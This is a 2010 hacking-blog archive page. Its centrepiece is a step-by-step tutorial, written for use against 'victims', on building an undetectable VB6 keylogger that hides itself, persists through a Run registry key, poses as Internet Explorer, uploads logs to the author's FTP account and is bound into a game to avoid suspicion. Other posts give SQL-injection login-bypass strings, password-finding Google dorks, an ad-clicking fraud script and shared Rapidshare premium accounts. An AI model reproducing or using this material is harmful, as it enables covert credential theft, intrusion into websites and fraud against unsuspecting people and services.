Monday, December 6, 2010

Rapidshare hack - Download unlimited files parallely

Many of my blog readers were asking me is there any way to download rapidshare files parallely
after a lot of research i found a method in which you can download  any number  of files parallely
Follow the given steps to download files simeltaniously

1. First download the rapidshare hack  file from Here

2. Now save the rapidshare hack  file as rapidshare hack .bat
    (note :- You can save it as anyfilename.bat )

3. Now search for rapidshare premium link generators in google or use these rapid share  
    premium  link generators  given bellow

    LIST of 4 Best Premium Link Generators:

4. Now you can download  four files parallely after you finish the download Run  rapidshare hack.bat every time before you download the next set of files by this methoid we can download any number files parallely , without any waiting time

Sunday, December 5, 2010

How To make your own FUD keylogger


After this tutorial you will be able to Make and Use a keylogger that is close to fully undetectable, without the victim getting suspicious. You will be able to keylog just about anyone.

This Guide will be split into 2 parts:

1 Writing your own undetectable keylogger

The language
Logging and storing
Uploading logs

2. Setting it up to be un-suspicious and trustworthy

Binding with other files
Making sure its existence is hidden

Before we begin I want to point out that this keylogger is NOT perfect.It will be unable to recordsome symbols It will occasionally rearrange a letter with one another if the user types fast But the passwords should easily get through.
In this guide we will be using Microsoft Visual Basic 6.0 (vb6 for short)
If you do not know/have this, dont leave just yet.
Reading this guide its not "Necessary" to have vb6 knowledge (highly recommended)

Download VB6 Torrent now.

Open up VB6 and choose standard EXE.
Put on your form:
3 timers
1 label

Double-click your form (design) and you see the source of our keylogger, almost empty at this point.

Go back to the design and set properties for the form
Set the form name to a few random letters (title doesnt matter)
Set Visible = false
Set ShowInTaskbar = false
This should make it invisible from the user.

Go back to the source and write the following in the "Form_Load" sub

If app.previnstance = true then end

app.taskvisible = false
Which means that if its already running and opened again, it will not start another keylogger (2 keyloggers running would cause errors), and it will not show in the taskmanagers Program list (but still in process list)
Now lets go to the General Section of our source and declare some API functions in order to start writing. General section can be found by using (General) in the top left scrollbar
There are 2 effective methods to keylog with VB6

- Keyhooks
- GetAsyncKeyState

We will be using GetAsyncKeyState, which checks if a key is being pressed when executed
But before we can start using GetAsyncKeyState we must declare it in the general section

GetAsyncKeyState Declaration:

^ tells what Lib we need for GetAsyncKeyState.
With this code placed we can start using GetAsyncKeyState commands.
To find out what key is pressed we need to use getasynckeystate as so:
If GetAsyncKeyState(number) <> 0 then
'code to execute if key is pressed
end if
Now you might be wondering what the "number" means, actually, the number we type here is a keyboard key, you see, every key has a number (KeyCode), from around 1 to 200. (1 and 2 being mouse buttons)
Full list of KeyCode values Thats alot of keycode. Now, theres an easy way of checking all of the keys at the same time. But it appears that doing it causes alot of weird symbols and capital letters only. But i want it done properly so I am going to check One key at a time. You can decide yourself what you want to do.I will show you the easy method too later on tho. Now that we know how to check for a keypress we want it to write it down somewheres temporary. There are many ways to do so, i will be using a label. You can use a String aswell. Set the caption of the label to nothing. Now a full example of the letter "a" would be this:

if GetAsyncKeyState(65) <> 0 then label1.caption = label1.caption + "a" end if

So that if "a" key is pressed an "a" is added to our label. Code 65-90 is a-z To check if a key is pressed more than one time we put the code in a timer. I find that it works best when the interval is set to around 125.
Which means that the code is executed 8 times a second. (125 milliseconds).
You must change the interval from 0 to 50-150, else it will not work. you can change the interval in the properties of the timer If you have less interval, it might double record the keystroke, if you have more, it might miss it. To start writing to a timer either choose "timer1" in the scrollbar in the top-left corner ofthe source page, or double-click the timer icon on the form design Do this again and again with all keys from a-z, and numbers 0-9 (also in numpad) Now it records letters and numbers, not bad, but we are far from done yet. If we finished up now our logs would be one big pile of letters, pretty much unreadable. So what we need to do is add spaces, and a hell lot of em. The user browses around alot, clicking here and there, so if we add spaces on keys like mouse buttons, space, enter, ctrl etc. we would get something readable with alot of spaces. So find Keycodes for those keys and add a space to the label if pressed. Most important is the mouse clicks. Now, were not done just yet. We want to check if a letter isCapital. we do that by checking if shift or caps-lock has been pressed before every key. And if it has, make it print a capital letter instead. Now to do this, we want to use booleans (true / false), so goto the general section and write this: The keycode for capsLock is 20. We want to write capslock like this in the timer.
if GetAsyncKeyState(20) <> 0 then
if caps = true then
label1.caption = label1.caption + "(/caps)"
caps = false
goto a
end if
label1.caption = label1.caption + "(caps)"
caps = true
end if
The above code may seem a little confusing, but its simple really. when CapsLock is pressed it writes (caps) into the label. and sets our boolean "caps" to "True". The next time capsLock is pressed (to disable it) instead of writing (caps) it writes (/caps). and Sets "caps" to "False". That way you will know that the letters between (caps) and (/caps) is allcapital . Nice! Everytime Caps-lock is pressed, it will add (caps) or (/caps) according to the state of the caps boolean. Its a little different with shift. Shift has the keycode 16 btw. dim "shift" as boolean inthe general section. just like before.
If GetasyncKeyState(16) <> 0 then
shift = true end if
So if Shift is pressed the "shift" boolean becomes true. now in all codes checking for letters add this: example with "a" key:
if GetAsyncKeyState(65) <> 0 then

if shift = true then
label1.caption = label1.caption + "A"
shift = false
goto b
end if
label1.caption = label1.caption + "a"
end if
(remember to use a different letter(s) in the goto commands every time) So if Shift has been pressed, the next key being pressed will becapital.
NOTE: You can do this with numbers too to get their symbol instead. You should now have in your timer, checking for a-z (all with shift check), alot of keys making spaces, capslock check, 0-9. Now. 2 very important keycodes are missing on the site, so i put them here Dot: Getasynckeystate(190) Comma: Getasynckeystate(188) We are now able to go to the next step. Writing to a Text Document. Having the logs in a label is not enough. We need to write it to a text-file every now and then. This process is really simple actually. Open up the source for the second timer (Timer2) and write following. I will explain below the quote.

On Error Go To skip
If Dir("c:\windows\klogs.txt") <> "" Then
Open "c:\windows\klogs.txt" For Append As #1
Write #1, Label1.Caption
Close #1
Open "c:\windows\klogs.txt" For Output As #1
Write #1, DateTime.Time
Write #1, Write #1, Label1.Caption
Close #1
End If
Label1.Caption = ""

don't worry, ill explain. The DIR command checks if a file exists. if it exists it executes the code below it, if it does not exist, it executes the code below "Else" the "Open" creates/opens a textfile, in this case, klogs.txt, you can change this. you can also change the location of it. Just locate it somewhere that the victim wont look. the "for output as #1" just gives the file a number so it knows what file to write to later on (incase more files are open), Output writes the text file, Input reads the text file, and Append adds more text to the existing text in the textfile. Also as you may notice, if the file does not exist then it writes the time of day into the file. This is useful for keeping track of when the specific log were from. In this case we only use Output and Append
"write #1, label1.caption" this writes the content of our label into file #1. "close #1" closes the file. 'Label1.caption = "" ' This deletes the content of our label1 which stores the info. We dont wanna write the same stuff to it again.
Now dont worry. all of this writing and creating happens invisibly. I suggest doing this every 30-60 seconds. (30 seconds = interval of 30000 on the timer) As said above, we write the Time of day into the log file to help os keep track of it. When the file is first created it will write the time into it. But thats not quite good enough. for us. We want it to write the time of date into the file every Time the keylogger is being opened again (usually after shutdown) So write this to the "Form_Load": So now it stores Time marks every time its opened. NEAT! now every 30-60 seconds all logs is stored in a text document. At this point you should try debugging the file. (little blue triangle button)

you will see nothing. but the keylogger is running.. try opening notepad or something and type something. after a minute or so, stop debugging (square button right of the debug button) and check the textfile (at your chosen location) it should contain everything you wrote. If not. Re-Check the last steps. Now. an important thing we must not forget is to make it run on startup =) there are 2 ways to do that, i will explain them both and let you choose which one to use. 1: Registry keys Here we copy the file to system32 and add an autorun reg-key to it so it starts when you start the computer. here how to do it: First we want to see if it already has one start up key. go to the Form_Load section again and write this:
if Dir("c:\windows\system32\Internet Explorer.exe") <> "" then
end if

This means that if the file in system32 (Internet Explorer.exe) already exists (will explain the name later) then it does nothing but if the file does not exist, it calls the sub called "regist". which copies the file and add a registry key to it. We're gonna write the "regist" sub now: add this at the bottom of the code:
Private Sub regist()
Dim regkey
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\windows\system32\Internet Explorer.exe"
Set regkey = CreateObject("")
regkey.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet Explorer.exe", "c:\windows\system32\Internet Explorer.exe"
End Sub
This copies the file iteself to system32 as Internet Explorer.exe (will explain in a moment), and then adds an autorun key to it. That,s basically the registry method.

Here is the Other method.

2: Copy to start up method. again, start with going to the Form_Load (IF you choose to use this method) and add "startup" which calls the start up sub we are about to make. Make a new sub called startup at the bottom of the code, like this: This searches for the Special folder "startup" and copies itself to there with the Internet Explorer name, If you want you can add VB attributes (setattr commands), like vbhidden or vbsystem. but i don't recommend that Because i had some problems with those attributes myself

Now choose one of the methods for startup (not both of them tho) and move on.
Now The final part is the most important one.
This is where we Upload the textfile to our FTP account.
You MUST have your own ftp account for this part.
I suggest using (its a zero), there you can create a free account.
Create a free ftp account there.
Once you have your FTP account.
We need to add a Internet Transfer Control component to our form.
You do that by going to Project >> Components. (ctrl + T) Find Microsoft Internet Transfer Control 6.0 and Tick it

press ok.
Now a new item is available in the toolbox (Inet).
drag it to your form.
select properties for it:
Protocol: icFTP
Username: (your 0catch username)
Password: your 0catch
Password Remotehost: and thats it.
Now the "URL" should say something like this:

Now we are connected to the FTP when executed.
We must use this connection to upload the logs to the FTP. we want to do that about every 90 seconds (since 90 seconds is max interval in timers). set Timer3's interval to 90000 (1½ minute) or less. then in Timer3's source write this:
On error resume next
Inet1.Execute , "PUT c:\windows\klogs.txt /" & DateTime.Date & ".txt"
Now, this finds our log (klogs.txt) and uploads it to the selected FTP, the files name will be the date of the day it is being run. This is so we can prevent overwriting previous logs by creating a new log for every day. This also makes it easier to find the log you need.
The "On error resume next" prevents the program from crashing if one log fails to upload. but instead tries again (errors happen rarely tho, but recommended to have) if you have a sub folder for the logs you can type "/subfolder/" & DateTime.Date & ".txt" Was that it? YES! its really that easy to upload a file. woowee!
Now. in the "LOAD" part add this:
label1.caption = ""
To make sure the label is empty when opened.
Now i promised also to show the lazy way.. which is not as good.
I DO NOT RECOMMEND USING THIS: this method uses Integer and a loop to do all keys.
In this method "i" is 1-120. "i" starts being 1, and every time it reaches the next command it starts at "for" as 1 higher. untill 120.
All letters will be caps and a lot of weird symbols will appear. "chr(i)" chr = character, "i" is again, the keycode.
Now, go to the design again and click the form itself (not any of the items inside the form) look through the options and find the Icon option. change the icon to Internet Explorer Icon
Guess what. were almost done.
We now should have a very undetectable keylogger (80-95% UD) NICE!. give it a test shot on your own computer by saving it as .EXE to your computer (debugging wont work now since we made it copy itself). At this point you should save the project to your computer, you can also make the EXE file.(Save as Internet Explorer.exe) That,s it for the first part. Get ready for part 2!

Setting it up to be trustworthy !

Now. An EXE file that appears to do nothing when opened seems a little suspicious, doesnt it? So there is a few ways to disguise it. 1. Binding it with another file. 2. Writing another program into it in VB6.

I prefer the first solution since it takes a long time to make it look like the game etc. closes when close button pressed. And it would take multiple forms as well.. so we will stick with Binding with another file or game of yours.

DO NOT use minor binding tools like Fresh Bind or alike.
Many of these makes the output detectable..
USE nBinder PRO, nBinder only makes it slightly more detectable.

Once you have nBinder PRO its time to make the keylogger EXE.
You do that in file >> make project.EXE (Save as Internet Explorer.exe, will explain..) when the EXE is created its time to find a file (preferably a game or alike) to bind it with.

Add the keylogger and the file to be bound with.
Right click the Keylogger (inside nBINDER) and select Options.

Tick "Execute" box (if not already ticked) and Tick "Start visible" box (if not already ticked)

Untick "Delete file at next boot" if you want the keylogger to stay in the file after first boot.
Now select options on the other file.
UNtick delete at next boot.
Now select iconfile and output name, compress the file.
Almost done now.
The reason it should be called Internet Explorer.exe and have Internet explorer icon (and copy as internet explorer.exe for that matter) is because some firewalls detects the FTP file uploading. and when the time comes when firewall asks if you want to allow the program internet connection, it will ask: Internet explorer is trying to access the internet .
Block / Remove Block. and display Internet Explorer icon.
That way it looks like its just IE that tries to get to the internet.. you can use other browsers for this as-well.. or messenger etc. Now my friend. when the file is executed. The game (or w/e) will launch immediately. when the game is exited the keylogger starts logging invisible. (and is copied to start-up / added a regkey) The victim shouldn't notice a thing. and very soon you will be the owner of their passwords =).

Download -The Hackers Underground Handbook

Download "The Hackers Underground Handbook "for free First time on blog

Last week i bought "The Hackers Underground Handbook" book for 20$ and i tought it might be very usefull for beginners .So i decided to share this book with my blog readers for a free of cost download the book from the link given bellow

The Hackers Underground Handbook

This book is designed for the absolute beginners who are willing to learn Hacking from the basics. This book does not demand any prior knowledge about Hacking. So if you are a newbie to the concept of hacking and want to master it from the basics, then this book is for you.

The information given in this underground handbook will put you into a hacker’s mindset and teach you all of the hacker’s secret.

The following skills are uncovered in this book

1. You will learn all the hackers underground tricks and learn to apply them in
the real world

2. You will be put into a hackers mindset and learn to think like one.

3. By Learning how a hacker thinks and acts, you will be able to protect yourself from future hack

4. You will acquire knowledge nonexistant to 99.9% of the people in the world!

5. This Underground handbook may get you interested in pursuing a career as an Ethical Hacker.

Follow the instructions to download the book

1.Download the book from Here

2. To get hte Password click Here

If you have any doubts please be free to comment

Wednesday, November 17, 2010

How to Hack and make money


Today i will Teach you how to make easy money is a PTC site(Paid to click).You get paid to click on ads and visit websites. The process is easy! You simply click a link and view a website for 30 seconds to earn money.In this article i will show you on How to hack to browse ads.By using this trick you will be able to surf more ads and the most amazing part is that you will not get banned by doing this.

Here is a step by step procedure to hack and make money:

Step 1:

First of all signup for account


Step 2:

You will need a firefox browser for this hack.


Install Greasemonkey Plugin then restart Firefox

Step 4:

Install Bux : Browse Ads script for Greasemonkey.


Step 5:

You are almost done just login and click on Surf Ads in your main menu.
Then the script will automatically launch and Browse Ads :


Saturday, November 6, 2010



We hear the same terms bandied about whenever a popular site gets hacked. You know… SQL Injection, cross site scripting, that kind of thing. But what do these things mean? Is hacking really as inaccessible as many of us imagine; a nefarious, impossibly technical twilight world forever beyond our ken?

Not really.

When you consider that you can go to Google right now and enter a search string which will return you thousands of usernames and passwords to websites, you realize that this dark science is really no mystery at all. You'll react similarly when you see just how simple a concept SQL Injection is, and how it can be automated with simple tools. Read on, to learn the basics of how sites and web content management systems are most often hacked, and what you can do to reduce the risk of it happening to you.

SQL Injection

SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.

When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.

In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.

Suppose we enter the following string in a Username field:

' OR 1=1 double-dash-txt.png

The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:

SELECT * FROM users WHERE username = ‘USRTEXT '
AND password = ‘PASSTEXT

…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.

So entering `OR 1=1 — as your username, could result in the following actually being run:

SELECT * FROM users WHERE username = ‘' OR 1=1 — 'AND password = '’

Two things you need to know about this:
['] closes the [username] text field.

'double-dash-txt.png' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:

SELECT * FROM users WHERE username = '' OR 1=1

1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc.

Let's hope you got the gist of that, and move briskly on.

Brilliant! I'm gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank, evidently.


But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:

username field examples:

  • admin'—
  • ') or ('a'='a
  • ”) or (“a”=”a
  • hi” or “a”=”a

… and so on.

Backdoor Injection- Modules, Forums, Search etc.
Hacking web forms is by no means limited exclusively to login screens. A humble search form, for instance, is necessarily tied to a database, and can potentially be used to amend database details. Using SQL commands in search forms can potentially do some extremely powerful things, like calling up usernames and passwords, searching the database field set and field names, and amending same. Do people really get hacked through their search forms? You better believe it. And through forums, and anywhere else a user can input text into a field which interacts with the database. If security is low enough, the hacker can probe the database to get names of fields, then use commands like INSERT INTO, UNION, and so forth to get user information, change product prices, change account settings/balances, and just about anything else… depending on the security measures in place, database architecture and so on.

So you can have security locked down at the login, but poor security on other forms can still be exploited. Unfortunately this is a real worry regarding 3rd party modules for Web CMS products which incorporate forms, and for CMS products these 3rd party modules are often the weakest links which allows hackers access to your database.

Automated Injection
There are tools to automate the process of SQL Injection into login and other fields. One hacker process, using a specific tool, will be to seek out a number of weak targets using Google (searching for login.asp, for instance), then insert a range of possible injection strings (like those listed above, culled from innumerable Injection cheat-sheets on the Web), add a list of proxies to cover his movements, and go play XBox while the program automates the whole injection process.

Remote Injection
This involves uploading malicious files to inject SQL and exploit other vulnerabilities. It's a topic which was deemed beyond the scope of this report, but you can view this PDF if you'd like to learn more.

SQL Injection in the Browser Address Bar
Injections can also be performed via the browser address bar. I don't mean to have a pop at Microsoft, but when it comes to such vulnerabilities, HTTP GET requests with URLs of the following form are most often held to be vulnerable:

Try adding an SQL command to the end of a URL string like this, just for kicks: AND id=11

See if both articles come up. Don't shoot your webmaster just yet if it's your own site and you get two articles popping up: this is real low-level access to the database. But some such sites will be vulnerable. Try adding some other simple SQL commands to the end of URLs from your own site, to see what happens.

As we saw above, access to the database raises a number of interesting possibilities. The database structure can be mapped by a skilled hacker through ill-conceived visibility of error messages — this is called database footprinting — and then this knowledge of table names and so forth can be used to gain access to additional data. Revealing error messages are manna - they can carry invaluable table name and structural details.

The following illustrative string is from Imperva. UNION SELECT username, password FROM USERS

There are vast swathes of information on SQL Injection available, here are a couple of good sources:

Cross Site Scripting (XSS)

XSS or Cross Site Scripting is the other major vulnerability which dominates the web hacking landscape, and is an exceptionally tricky customer which seems particularly difficult to stop. Microsoft, MySpace, Google… all the big cahunas have had problems with XSS vulnerabilities. This is somewhat more complicated than SQL Injection, and we'll just have a quick look to get a feel for it.

XSS is about malicious (usually) JavaScript routines embedded in hyperlinks, which are used to hijack sessions, hijack ads in applications and steal personal information.

Picture the scene: you're there flicking through some nameless bulletin board because, yes, you really are that lazy at work. Some friendly girl with broken English implores you to get in touch. 'Me nice gurl', she says. You've always wondered where those links actually go, so you say what the hell. You hover over the link, it looks like this in the information bar:


Hmmm…what the hell, let's give it a bash, you say. The one thing I really need right now is to see an ad for cheap Cialis. Maybe the linked page satisfies this craving, maybe not. Nothing dramatic happens when you click the link, at any rate, and the long day wears on.

When a link in an IM, email, forum or message board is hexed like the one above, it could contain just about anything. Like this example, from SandSprite, which helps steal a session cookie, which can potentially be used to hijack a session in a web application, or even to access user account details.


Stealing cookies is just the tip of the iceberg though — XSS attacks through links and through embedded code on a page or even a bb post can do a whole lot more, with a little imagination.

XSS is mostly of concern to consumers and to developers of web applications. It's the family of security nightmares which keeps people like MySpace Tom and Mark Zuckerberg awake at night. So they're not all bad then, I suppose…

For additional resources on this topic, here's a great overview of XSS (PDF) and just what can be accomplished with sneaky links. And here's an in-depth XSS video.

Authorization Bypass

Authorization Bypass is a frighteningly simple process which can be employed against poorly designed applications or content management frameworks. You know how it is… you run a small university and you want to give the undergraduate students something to do. So they build a content management framework for the Mickey Bags research department. Trouble is that this local portal is connected to other more important campus databases. Next thing you know, there goes the farm

Authorization bypass, to gain access to the Admin backend, can be as simple as this:

  • Find weak target login page.
  • View source. Copy to notepad.
  • Delete the authorization javascript, amend a link or two.
  • Save to desktop.
  • Open on desktop. Enter anything into login fields, press enter.
  • Hey Presto.

Here's a great video of a White Hat going through the authorization-bypass process on YouTube. This was done against a small university's website. It's a two-minute process. Note that he gets into the User 1 account, which is not the Admin account in this case. Is Admin User 1 on your User table?

Google Hacking

This is by far the easiest hack of all. It really is extraordinary what you can find in Google's index. And here's Newsflash #1: you can find a wealth of actual usernames and passwords using search strings.

Copy and paste these into Google:


…and this one is just priceless…
“login: *” “password= *” filetype:xls

Such strings return very random results, and are of little use for targeted attacks. Google hacking will primarily be used for finding sites with vulnerabilities. If a hacker knows that, say, SQL Server 2000 has certain exploits, and he knows a unique string pushed out by that version in results, you can hone in on vulnerable websites.

For specific targets Google can return some exceptionally useful information: full server configurations, database details (so a good hacker knows what kind of injections might work), and so forth. You can find any amount of SQL database dumps as well (fooling around with a Google hack while preparing this article, I stumbled across a dump for a top-tier CMS developer's website). And a vast amount more besides. is the man to go to for Google hacks. One interesting one I toyed with invited me to the Joomla! install page for dozens of sites… people who had uploaded Joomla!, decided against installing it, and subsequently had either left the domain to rot, or else set a redirect on the page to, say, their Flickr account (in one case). Allowing anybody to walk in and run through the installer. Other query strings target unprotected email/IM archives, and all sorts of very sensitive information. What fun we can have!

Password Cracking

Hashed strings can often be deciphered through 'brute forcing'. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it.

You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can't be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.

Friday, June 11, 2010

How to lock folder in windows 7/vista

In my last post i told u how to lock a folder in xp folder lock

Tody iam going to teach u How to Lock/Password protect a Folder in Windows XP, Vista

We have a lot of sensitive data stored on our computer and it needs to be protected from illegal/unwanted access. There are many softwares available such as Folder Lock which are used to password protect a folder and help us to lock a folder in windows XP, Vista. Today in this article, I will inform you one of the simplest way on how to lock/password protect a folder in Windows XP or windows Vista
. I have provided link for software download
to lock a folder in windows xp and vista... just read on.

How to Password protect a folder:

Simply follow the guidelines given below to lock/password protect a folder in Windows XP, Vista.

1. Free Download

Bat File to lock/password protect afolder.

2. Now, copy "LockFolder.bat" to any desired folder where you want to store password protected files. Double click on "LockFolder.bat" and a new folder named "Locker" will be created.

3. Move all your files you want to hide in this newly created "Locker" folder.

4. Again double click on "LockFolder.bat" file and you will see a command prompt asking for confirmation. Hit "Y" to confirm that you want to lock/password protect the folder and hit enter.

How to Lock a Folder in Windows

5. The "Locker" folder will become invisible and thus, you are able to lock a folder in windows XP, Vista.

6. Now, when you want to unlock folder, again double click "LockFolder.bat" file and you will see command prompt asking for password to unlock folder. Enter "pass" (without quotes) as password and hit enter. You will again see the folder containing your private data and files.

Lock Folder in Windows Xp, Vista

That's it. So friends, I hope you are now well approached with this simple technique on how to lock/password protect a folder. If you have any problem in using this technique to password protect a folder in windows XP, Vista, please mention it in comments.

Enjoy the technique to password protect
a folder in windows XP, Vista...

Sunday, January 3, 2010

Rapidshare Premium hack

Happy new year to all my viewers . It is a new year a new beginning so i have decided to give my viewers a new year gift

In this post i am going to give you free rapid share premium accounts

Rapid share Premium hack

1 . download rapid share premium accounts here

2 . open pass.txt

3. you can use all the premium accounts
Enjoy downloading ,please thank me in comments



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